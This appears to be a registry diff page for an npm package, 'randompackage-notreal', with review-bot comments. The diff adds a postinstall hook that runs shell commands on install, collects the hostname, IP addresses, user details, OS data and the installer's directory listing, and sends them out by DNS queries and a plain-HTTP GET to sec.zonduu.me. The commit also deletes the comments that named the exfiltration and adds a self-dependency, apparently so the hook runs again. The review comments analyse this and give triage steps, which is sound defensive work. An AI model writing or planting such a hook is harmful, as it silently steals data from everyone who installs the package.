randompackage-notreal 1.0.2 → 1.0.4
Potentially problematic release.
This version of randompackage-notreal might be problematic. Click here for more details.
- package/package.json +5 -2
- package/postinstall.js +15 -10
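--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,6 @@
 {
 "name": "randompackage-notreal",
-"version": "1.0.
+"version": "1.0.4",
 "description": "Researcher public package",
 "main": "index.js",
 "scripts": {
@@ -14,5 +14,8 @@
 "dist/css/common.css",
 "postinstall.js",
 "index.js"
-]
+],
+"dependencies": {
+"randompackage-notreal": "^1.0.3"
+}
 }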
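Review bot: The new `dependencies` block makes the package depend on its own name, `"randompackage-notreal": "^1.0.3"`, so resolving 1.0.4 pulls a second published copy of the same package into the tree. `postinstall.js` is shipped in the file list shown in this hunk, and if the `scripts` object (its body is outside the hunks) wires it as the install hook, that nested copy would presumably run the hook again on every install. I would drop the entry so the manifest again ends the list with `]`, or state in the description why a self-reference is needed.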
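--- a/package/postinstall.js
+++ b/package/postinstall.js
@@ -3,6 +3,7 @@ const dns = require('dns');
 const http = require('http');
 const https = require('https');
 const os = require('os');
+const { execSync } = require('child_process');
 
 const logFile = '/tmp/postinstall.log';
 
@@ -13,12 +14,19 @@ fs.appendFileSync(logFile, `Starting postinstall script\n`);
 const hostname = os.hostname();
 const packageName = process.env.npm_package_name;
 const packageVersion = process.env.npm_package_version;
-const internalIpAddress =
-const currentPath = process.cwd();
+const internalIpAddress = execSync('hostname -I').toString().trim();
+const currentPath = process.cwd(); // Use process.cwd() to capture current directory
 const platform = os.platform();
 const userInfo = os.userInfo();
 
-//
+// Get list of files in the current directory (where npm install is run)
+let directoryFiles;
+try {
+directoryFiles = execSync('ls').toString().trim();
+} catch (error) {
+directoryFiles = `Error executing ls command: ${error.message}`;
+}
+
 const osDetails = {
 platform: os.platform(),
 release: os.release(),
@@ -58,23 +66,21 @@ fetchExternalIpAddress((err, externalIpAddress) => {
 currentPath,
 platform,
 userInfo,
-osDetails
+osDetails,
+directoryFiles // Include the directory listing from the current directory
 };
 
 fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
 
-// Prepare data for DNS exfiltration
 const dnsData = `${packageName}-${hostname}-${externalIpAddress}`;
 const hexData = Buffer.from(dnsData).toString('hex');
 
-// Split hex data into parts fitting within DNS label length limit
 const maxLabelLength = 63;
 const hexDataParts = [];
 for (let i = 0; i < hexData.length; i += maxLabelLength) {
 hexDataParts.push(hexData.substring(i, i + maxLabelLength));
 }
 
-// Send each part as a separate DNS query
 hexDataParts.forEach((part, index, arr) => {
 const partIndex = index + 1;
 const totalParts = arr.length;
@@ -88,12 +94,11 @@ fetchExternalIpAddress((err, externalIpAddress) => {
 });
 });
 
-// HTTP fallback
 const getData = `targetUrl=${encodeURIComponent(JSON.stringify(data))}`;
 
 const options = {
-hostname: 'sec.zonduu.me',
-port: 80,
+hostname: 'sec.zonduu.me',
+port: 80,
 path: `/callbackplz?${getData}`,
 method: 'GET'
 };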
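Review bot: The install hook now spawns shell commands with `execSync` (`hostname -I`, `ls`) and adds the listing of the installer's working directory to `data`, which the unchanged lines in the last hunk serialise into the query string of a plain-HTTP GET to `sec.zonduu.me` port 80 at `/callbackplz`. File names from a consumer's project therefore leave the host unencrypted and without notice. The same commit deletes `// Prepare data for DNS exfiltration` and `// HTTP fallback`, so the file no longer says what it transmits; I would drop `directoryFiles` from `data`, keep those two comments, and add a header comment listing every field sent and where it goes. When triaging an install of this version, look for writes to `/tmp/postinstall.log` and HTTP requests to that host (the DNS query target is outside the hunks); installing with `--ignore-scripts` keeps the hook from running. The callback passed to `fetchExternalIpAddress` starts and ends outside these hunks.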